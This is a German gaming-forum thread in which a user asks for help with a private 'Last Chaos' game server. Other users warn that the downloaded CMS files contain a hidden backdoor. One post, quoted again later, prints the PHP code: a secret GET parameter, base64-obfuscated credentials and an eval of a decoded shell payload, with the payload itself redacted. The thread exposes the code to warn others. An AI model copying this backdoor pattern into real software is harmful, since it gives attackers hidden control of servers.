P-Server

Page 1 of 2 1 2
03/29/2016 00:10 alfa09071987#1
Hallo.
ich möchte eine Last chaos P-Server erstellen.
hab soweit die server files.
nur habe ich probleme mit den client.
liegt glaub am update server.
und da is der hund begraben, kann mir jemand helfen wie ich sowas zustande bekomme ?

LG
Matze
03/29/2016 00:18 EEOI#2
Dein Text bringt uns genau 0.
Werde mal genauer und schreibe Dinge wie, welche Files, welcher Client, wo wird getestet, was genau ist das Problem usw.
03/29/2016 03:56 alfa09071987#3
ja stimmt war etwas doof von mir sorry.

ich teste das kannse auf Debian 7
(noch auf Home PC) bis es richtig Läuft dann kommt es auf nen richtigen Server.)

die files habe ich von diesen video.

laut aussage EP4 2015 files.
Client soll der 2015ner sein.

das Problem ist folgentes.
wenn ich den Client Patche mit Meiner IP bekomme ich ein fehler das er sich nicht verbinden kann.
Connect Info Open FAILED!

Bei weiteren Fragen gerne fragen.
03/29/2016 13:29 Ih¢sãs123#4
Du arbeitest an einem lokalen Rechner, also nutze die Macht der 127.0.0.1

Oder frag Liquid der hat Zeit und hilft gerne ;)
03/29/2016 14:54 Frezona♥!#5
Quote:
Originally Posted by Ih¢sãs123 View Post
Du arbeitest an einem lokalen Rechner, also nutze die Macht der 127.0.0.1

Oder frag Liquid der hat Zeit und hilft gerne ;)
Wie den ohne Skype Account :D
03/29/2016 19:12 alfa09071987#6
ich habe skype :)
" matze18000 "
gerne adden
hab es mit local ip gemacht.

aber irgendwie will er nicht :(
wäre echt schön wenn mir das jemand erklären könnte.
is denk echt nur ein sympler fehler nur ich find ihn nicht.
03/30/2016 08:42 xPainlessx#7
Quote:
Originally Posted by alfa09071987 View Post
ja stimmt war etwas doof von mir sorry.

ich teste das kannse auf Debian 7
(noch auf Home PC) bis es richtig Läuft dann kommt es auf nen richtigen Server.)

die files habe ich von diesen video.
[Only registered and activated users can see links. Click Here To Register...]

laut aussage EP4 2015 files.
Client soll der 2015ner sein.

das Problem ist folgentes.
wenn ich den Client Patche mit Meiner IP bekomme ich ein fehler das er sich nicht verbinden kann.
Connect Info Open FAILED!

Bei weiteren Fragen gerne fragen.
Ich würde dir empfehlen von diesen files die finger zu lassen, wir haben in den files gestern wirklich intressante dinge gesehen, so dass man sie lieber nicht nehmen sollte :)
03/30/2016 10:33 EEOI#8
Quote:
Originally Posted by xPainlessx View Post
Ich würde dir empfehlen von diesen files die finger zu lassen, wir haben in den files gestern wirklich intressante dinge gesehen, so dass man sie lieber nicht nehmen sollte :)
Zum Beispiel?
Mit belegen bitte;)
03/30/2016 11:05 Ih¢sãs123#9
Quote:
Originally Posted by EEOI View Post
Zum Beispiel?
Mit belegen bitte;)
Bunte Farben, lilane Charactere und noch mehr bunte Farben.
:bandit::bandit::bandit::bandit::bandit:

Leider keine Belege (hast du übrigens klein geschrieben f4g), da es nur im Kopf stattgefunden hat.

Hät´s gerne auch Belegt. Thx.
03/30/2016 13:17 xPainlessx#10
Ich hab den TE einfach mal in skype geadded :)
03/30/2016 13:26 LCJunk#11
im lc-cms was da drunter verlinkt wurde gibt es in der core/functions.php auf den zeilen 92-110 einen interessanten block:
PHP Code:
if(isset($_GET[base64_decode('cA==')]))
  {
    if($_GET[base64_decode('cA==')]==md5(base64_decode('TE9M')))
    {
      $user=base64_decode('STQ3');
      $pass=base64_decode('VFJPTE9M');
      
      function zWM($NXlKO)
      { 
        $NXlKO=gzuncompress(base64_decode($NXlKO));
        for($i=0;$i<strlen($NXlKO);$i++)
        {
          $NXlKO[$i]=chr(ord($NXlKO[$i])-1);
        }
        return $NXlKO;
      }
      eval(zWM(base64_decode('UNKENNTLICHGEMACHTE_I47-SHELL')));
    }
  } 
I-47 kann man ja mal googeln, ich würde sowas nicht auf meinem server wollen und zumindest diese zeilen entfernen.
03/30/2016 13:36 alfa09071987#12
hey. Danke für eure Antworten.
Aber wenn in den einen file schon sowas drin steht wer weiß in wievielen noch.

am besten die files garnicht nutzen oder?.

aber es ist auch wirklich schwer files zu finden. :(

mfg
03/30/2016 13:41 damona#13
Quote:
Originally Posted by Ih¢sãs123 View Post
Bunte Farben, lilane Charactere und noch mehr bunte Farben.
:bandit::bandit::bandit::bandit::bandit:

Leider keine Belege (hast du übrigens klein geschrieben f4g), da es nur im Kopf stattgefunden hat.

Hät´s gerne auch Belegt. Thx.
Quote:
Originally Posted by LCJunk View Post
im lc-cms was da drunter verlinkt wurde gibt es in der core/functions.php auf den zeilen 92-110 einen interessanten block:
PHP Code:
if(isset($_GET[base64_decode('cA==')]))
  {
    if($_GET[base64_decode('cA==')]==md5(base64_decode('TE9M')))
    {
      $user=base64_decode('STQ3');
      $pass=base64_decode('VFJPTE9M');
      
      function zWM($NXlKO)
      { 
        $NXlKO=gzuncompress(base64_decode($NXlKO));
        for($i=0;$i<strlen($NXlKO);$i++)
        {
          $NXlKO[$i]=chr(ord($NXlKO[$i])-1);
        }
        return $NXlKO;
      }
      eval(zWM(base64_decode('UNKENNTLICHGEMACHTE_I47-SHELL')));
    }
  } 
I-47 kann man ja mal googeln, ich würde sowas nicht auf meinem server wollen und zumindest diese zeilen entfernen.

Das stimmt hier wurde ein backdoor geproggt, das stammt aber denke nicht von toxic.

Hier ist mal der Code welcher ausgeführt werden kann durch das backdoor

[Only registered and activated users can see links. Click Here To Register...]

Es ist quasi ne ganze GUI/Plattform.
03/30/2016 14:28 Ih¢sãs123#14
Quote:
Originally Posted by damona View Post
Das stimmt hier wurde ein backdoor geproggt, das stammt aber denke nicht von toxic.

Hier ist mal der Code welcher ausgeführt werden kann durch das backdoor

[Only registered and activated users can see links. Click Here To Register...]

Es ist quasi ne ganze GUI/Plattform.
Base64 für sowas zu nutzen ist so 90er Jahre :bandit:
Trotzdem witzig das sich jemand die Mühe gemacht hat.

Edit: Die Files haben trotzdem wenig mit der Website zu tun, für die Files gibt es noch nichts?

Edit2: Von Toxic war meiner Meinung nach eines drin, entweder im footer oder in diesem wo man AGB´s bestätigen sollte(hab ich damals bei einigen entfernt). Damit konnte er sich die MySQL-Daten anzeigen lassen.
Bei mir gibt es das oben genannte Backdoor nicht und die CMS liegt schon ewig auf unserem (EEOI´s und meinem) Root und hab sie damals über Skype bekommen. D.h. das Backdoor wurde nachträglich unabhängig von Toxic eingebaut.
03/30/2016 17:32 damona#15
Quote:
Originally Posted by Ih¢sãs123 View Post
Base64 für sowas zu nutzen ist so 90er Jahre :bandit:
Trotzdem witzig das sich jemand die Mühe gemacht hat.

Edit: Die Files haben trotzdem wenig mit der Website zu tun, für die Files gibt es noch nichts?

Edit2: Von Toxic war meiner Meinung nach eines drin, entweder im footer oder in diesem wo man AGB´s bestätigen sollte(hab ich damals bei einigen entfernt). Damit konnte er sich die MySQL-Daten anzeigen lassen.
Bei mir gibt es das oben genannte Backdoor nicht und die CMS liegt schon ewig auf unserem (EEOI´s und meinem) Root und hab sie damals über Skype bekommen. D.h. das Backdoor wurde nachträglich unabhängig von Toxic eingebaut.

Ist einfach nen HackScript/Shell von nem Indischen Hacker der es released hat, das ist einfach hier verbaut worden.

Nun wissen wir auch warum hier einige auf wannabe falo's machen obwohl sie einfach nen infizierten server nutzen und meinen sie haben es ingame geduped :rolleyes:
Page 1 of 2 1 2